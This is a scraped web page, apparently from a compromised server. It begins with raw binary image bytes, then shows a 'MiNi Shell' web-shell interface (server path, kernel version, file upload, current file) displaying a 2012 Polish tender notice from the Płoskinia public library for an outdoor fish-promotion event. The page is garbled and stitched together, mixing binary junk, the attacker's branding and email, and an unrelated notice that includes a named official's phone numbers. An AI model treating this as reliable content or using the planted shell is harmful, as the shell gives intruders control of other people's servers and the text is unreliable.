JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120823/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120823/312118-N-2012.html

<p class="kh_header"><b>Płoskinia: Organizacja i przeprowadzenie imprezy -Promocja terenu LGR Zalew Wiślany oraz zachowań proekologicznych poprzez organizację imprezy plenerowej</b><br>
<b>Numer ogłoszenia: 312118 - 2012; data zamieszczenia: 23.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Biblioteka Publiczna Gminy Płoskinia , Płoskinia 2, 14-526 Płoskinia, woj. warmińsko-mazurskie, tel. 055 620 86 15, faks 055 620 86 15.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie imprezy -Promocja terenu LGR Zalew Wiślany oraz zachowań proekologicznych poprzez organizację imprezy plenerowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest; 
1.Organizacja i przeprowadzenie imprezy w ramach projektu Promocja terenu LGR Zalew Wiślany oraz zachowań proekologicznych poprzez organizację imprezy plenerowej. W dniu 16.09.2012r. zorganizowana zostanie jednodniowa otwarta impreza promująca obszar objęty LSROR (10 godzin). Spotkanie zostanie zorganizowane w miejscowości Płoskinia na dz. Nr 126/3, 125/1- boisko szkolne. 
Harmonogram imprezy: 10,00 - rozstawienie stoisk, przygotowywanie imprezy, 15,00-uroczyste otwarcie (przywitanie gości, prezentacja stoisk z twórczością ludową, stoisk z przygotowanym potrawami rybnymi, regionalnymi), 15,30 - konkurencje tematyczne związane z obszarem objętym LSROR (quiz podczas którego zadawane będą pytania dotyczące obszaru objętego LSROR),  16,00 - wręczenie nagród i upominków, 17,00 - występ dietetyka na scenie lub sali widowiskowej, 16,00 - przegląd zespołów szanty-disco, 16,00 - poczęstunek dla uczestników, 17,00 - konkurencje tematyczne związane z obszarem objętym LSROR - część II (quiz podczas którego zadawane będą pytania dotyczące obszaru objętego LSROR), 18,00 - wręczenie nagród i upominków za część II, 20,30 - gwiazda wieczoru i zabawa taneczna.
2.Przedmiot zamówienia obejmuje realizację i wykonanie następujących zadań;
1)Plakaty promocyjne - zaprojektowanie wydruku i dystrybucja 500 szt. plakatów promujących kampanię i obszar objęty LSROR. Plakat oparty o nowoczesną grafikę z wyraźnym przesłaniem promocyjnym. Format B2, papier kredowy, kolor 4/0 (jednostronnie), lakier dyspersyjny, brak listwowania, ilość stron: 1. Wykonane plakaty zostaną rozwieszone przed imprezą, będą zawierały hasło przewodnie, datę i miejsce imprezy, logotypy instytucji finansujących oraz informację o planowanym przebiegu imprezy jak również krótkie informacje na temat obszaru w celu jego wypromowania i ukazania atrakcyjności. Wizualizacja projektów zatwierdzona musi być przez Zamawiającego - protokołem.
2)Ogłoszenia promocyjne w prasie  -  zamieszczone zostaną 2 ogłoszenia promocyjne w prasie ponadregionalnej, zamieszczone przed imprezą, zawierające informacje o miejscu, harmonogramie, instytucji finansującej. Wymiar 10 cm x 7 cm. 
Wizualizacja projektów zatwierdzona musi być przez Zamawiającego - protokołem.
3)Gadżety promocyjny - zakup i dystrybucja gadżetów opatrzonych logo UE, PO Ryby, oraz LGR Zalew Wiślany, które będą stanowiły element promocji obszaru (gadżety bezpłatnie rozdane uczestnikom imprezy): 
- flagi  na lusterka z logiem  500 szt., 
- smycze 500 szt.,
- długopisy 250 szt.,
- balony 1000 szt.
Zapewnienie 2 osób do rozdania, pawilon ogrodowy. Wizualizacja gadżetów
zatwierdzona musi być przez Zamawiającego - protokołem. 
Lista wydanych gadżetów promocyjnych sporządzona na druku dostarczonym przez 
Zamawiającego.
4)Potrawy rybne  - przygotowanie i dystrybucja potraw rybnych dla uczestników imprezy (degustacja potraw) - 500  porcji (porcja ok. 150 gram), w tym; leszcz wędzony (dzwony) -300 porcji, leszcz w occie -100 porcji, kotlety z leszcza -100 porcji. Zapewnienie 3 osób do wydawania potraw, pawilon ogrodowy.
5)Poczęstunek dla uczestników - poczęstunek dla uczestników imprezy - 750 porcji (porcja ok. 150 gram) ciepłych posiłków składających się z potraw regionalnych, które przyczynią się do promocji obszaru objętego LSROR (bigos po warmińsku-250 porcji., warmińska zupa rybna - 250 porcji, pikantny barszcz po warmińsku -250 porcji., pieczywo, dodatki).  Zapewnienie 3 osób do wydawania potraw, pawilon ogrodowy.
6)Dietetyk - kampania podczas imprezy - specjalista dietetyk przeprowadzi wykład (3 godziny) przekonując uczestników do konsumowania ryb. Przeprowadzona kampania pozwoli na wypromowanie terenu objętego LSROR, zachęci do jego odwiedzania np. po zakup ryb lub innych produktów rybnych, uatrakcyjni organizowana imprezę promocyjną. Miejsca, w których odbędą się spotkania należy oznaczyć logotypami. Spotkanie przeprowadzone na boisku sportowym lub Sali sportowej ZS Płoskinia. Miejsce organizacji spotkania zapewnia Zamawiający.
Zamawiający zatwierdza plan wykładu. 
7)Naczynia jednorazowe (talerzyki, sztućce, kubeczki) - zapewnienie jednorazowych naczyń uczestnikom imprezy do degustacji zupy rybnej, innych potraw. Talerzyki- 1000 szt., miseczki -1000 sztuk, sztućce - 2000 szt., naczynia jednorazowe - 1000 szt.
8)Osoba prowadząca spotkanie - osoba, która  będzie prowadziła imprezę, konkursy, jak również przekazywać będzie  odpowiednie informacje dla uczestników - zapoznanie uczestników z terenem objętym LSROR, dziedzictwem kulturalnym występującym na jego obszarze  (10 godzin). Zakres przekazywanych informacji uzgodniony z Zamawiającym.
9)Nagrody za udział w konkursach - za udział w organizowanych quizach przewidziano nagrody rzeczowe za I, II, III miejsce oraz wyróżnienia; książki 20 szt. i atlasy edukacyjne o tematyce obszaru objętego LSROR 20 szt., sprzęt wędkarski 20 szt., kubki z nadrukiem 20 szt.. Nagrody opatrzone logo UE, PO Ryby, oraz LGR Zalew Wiślany. Lista wydanych nagród sporządzona na druku dostarczonym przez Zamawiającego
10)Obsługa medyczna imprezy - zapewnienie karetki odpowiadającej wyposażeniu karetce podstawowej P Państwowego Systemu Ratownictwa z dwoma uprawnionymi Ratownikami Medycznymi. Dostępność podczas imprezy przez 8 godzin.
11)Opłata ryczałtowa za prąd elektryczny należy określić i opłacić opłatę ryczałtową za prąd podczas trwania całej imprezy promocyjnej (od godz. 8,00 do 24,00). 
12)Wywóz nieczystości, śmieci - usługa wynajmu niezbędna do zapewnienia porządku w trakcie organizowanej imprezy promocyjnej ale i również po jej zakończeniu; kosze na śmieci (wynajem -20 szt, ), kontenery na śmieci (2 kontenery),
wywóz zebranych nieczystości, utylizacja nieczystości.
13)Osoby porządkowe - usługa zapewniona na czas trwania imprezy plenerowej pozwalająca na zachowanie terenu i miejsca spotkania w należytym porządku i czystości (po imprezie posprzątanie terenu) - 4 osoby przez 12 godzin.
14)	Wynajem kabin WC - wynajem i obsługa standardowych kabin sanitarnych na czas trwania imprezy - szt. 8 o normalnym standardzie wyposażenia oraz 1 sztuka tzw. VIP ( z dostępem do bieżącej wody ) - łącznie 9 kabin.
15)	Atrakcje dla dzieci i młodzieży (wynajem) - w trakcie imprezy należy zapewnić dla dzieci i młodzieży następujące atrakcje (rozstawienie oraz obsługa):  
- dmuchany zamek duży wym. min. 8,5 m x 5 m x 5 m o tematyce bajkowej (w 
godzinach  od 12,00 do 20,00), 
- mały zamek z trampoliną wym. min. 6 m x 5 m x 4,5 m o tematyce bajkowej (w 
godzinach  od 12,00 do 20,00), 
- kostiumy maskotki duże 8 sztuk o tematyce rybnej oraz bajkowej (zapewnienie 8  
osób w godzinach  od 15,00 do 20,00).
3.Zamawiający wyznacza termin dokonania wizytacji terenu imprezy przez Wykonawców do dnia 29.08.2012r., która zostanie potwierdzona protokołem podpisanym przez Zamawiającego. Osobą wyznaczoną do podpisania protokołu z ramienia Zamawiającego jest Pan Łukasz Korneluk tel. 556208605, kom. 605361213 w godz. 8,00-15,00 w dni robocze.
4.Przed podpisaniem umowy na realizację przedmiotu zamówienia Zamawiający będzie żądał przedłożenia niżej wymienionych umów;
1)na dostawę ryby wykorzystywanej do sporządzenia potraw rybnych pochodzącym z terenu objętego działaniem Lokalnej Grupy Rybackiej Zalew Wiślany.
2)z wykonawcą Warmińskich potraw regionalnych pochodzącym z terenu objętego działaniem Lokalnej Grupy Rybackiej Zalew Wiślany..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.95.20.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium w wysokości  1 000,00 PLN /słownie; jeden tysiąc zł./
2. Wadium uznaje się za wniesione w momencie uznania na rachunku Zamawiającego (realnego wpływu wadium na rachunek Zamawiającego przed terminem składania ofert)
3. Wadium może być wniesione  w  jednej lub kilku następujących formach:
    1) pieniądzu,
    2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowe-
        kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem kasowym
   3) gwarancjach bankowych
   4) gwarancjach ubezpieczeniowych
   5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz. U. Nr 109, poz. 1158 z późn. zm)
4. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy; 
Braniewsko-Pasłęcki BS Oddział Braniewo Filia Płoskinia Nr 76 8313 0009 0051 5168 2000 0030 z dopiskiem  Organizacja i przeprowadzenie imprezy -Promocja terenu LGR Zalew Wiślany oraz zachowań proekologicznych poprzez organizację imprezy 
plenerowej.
5. Zwrot oraz zatrzymanie wadium następuje zgodnie z zasadami opisanymi w art.  46 ustawy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli wykonawca złoży stosowne oświadczenie o spełnieniu tego warunku (oświadczenia o spełnieniu warunków udziału w postępowaniu  wg wzoru - załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również  
wykonywanych, dostaw lub usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie;- minimum jedno  zamówienie organizacji imprezy promocyjnej organizowanej w ramach środków Os 4 programu Operacyjnego Ryby i wartości min. 35,0 tys. zł. Brutto. Ocena spełniania warunku zostanie dokonana na podstawie wykazu wykonanych usług oraz dołączonego dokumentu potwierdzającego wykonanie usługi z należytą starannością.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli wykonawca złoży stosowne oświadczenie o spełnieniu tego warunku (oświadczenia o spełnieniu warunków udziału w postępowaniu wg wzoru - załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli wykonawca złoży stosowne oświadczenie o spełnieniu tego warunku (oświadczenia o spełnieniu warunków udziału w postępowaniu wg wzoru - załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli wykonawca złoży stosowne oświadczenie o spełnieniu tego warunku (oświadczenia o spełnieniu warunków udziału w postępowaniu wg wzoru - załącznik nr 2 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy z wykorzystaniem wzoru /załącznik Nr 1/.
2. Dowód wniesienia wadium.
3. Wykaz podwykonawców przewidzianych do wykonywania zamówienia - jeżeli będą 
 uczestniczyć w realizacji zamówienia dołączyć - załącznik nr 5.
4. Protokół z wizytacji miejsca organizacji imprezy podpisany przez Zamawiającego.
5. Pełnomocnictwo dla osoby reprezentującej Oferenta w postępowaniu /jeżeli oferenta  reprezentuje przedstawiciel/.   
6. Pisemne zobowiązania innych podmiotów do korzystania z doświadczenia i wiedzy innych podmiotów; poleganiu na potencjale technicznym innych podmiotów; udostępnieniu osób zdolnych do wykonywania zamówienia; zdolnościach finansowych innych podmiotów na realizację przedmiotu zamówienia jeżeli wykonawca wykazał iż będzie korzystał.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy zgodnie z art. 144 ust 1 ustawy jeżeli konieczność ich wprowadzenia wyniknie z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, w szczególności;  
1)  terminu realizacji zamówienia, terminów dokonania poszczególnych czynności wskazanych  w umowie, w następujących sytuacjach: 
a) w przypadku opóźnienia w rozpoczęciu lub realizacji usługi, rozliczeniu zadania - o ile opóźnienie nie wynika z przyczyn leżących po stronie Wykonawcy, 
b) W przypadku wystąpienia siły wyższej zmiana wymaga zgody obu stron umowy. Przez siłę wyższa rozumie się zdarzenie lub połączenie zdarzeń obiektywnie niezależnych od stron, które zasadniczo i istotnie utrudniają wykonanie części lub całości zobowiązań wynikających z umowy, których strony nie mogły wcześniej przewidzieć i których nie mogły przeciwdziałać poprzez działanie z należyta starannością ogólnie przewidziana dla cywilnoprawnych stosunków zobowiązaniowych. 
2)  W przypadku wystąpienia innych nieprzewidzianych okoliczności, powodujących 
konieczność zmiany terminu/terminów,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ploskinia-ug.bip-wm.pl w zakładce Instytucja kultury<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biblioteka Publiczna Gminy Płoskinia, 14-526 Płoskinia..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.08.2012 godzina 10:00, miejsce: Biblioteka Publiczna Gminy Płoskinia, 14-526 Płoskinia.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> PO RYBY 2007-2013 w ramach środka 4.1 Rozwój obszarów zależnych od rybactwa z wyłączeniem realizacji operacji polegających na funkcjonowaniu lokalnej grupy 
rybackiej (LGR) oraz nabywaniu umiejętności i aktywizacji lokalnych społeczności.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com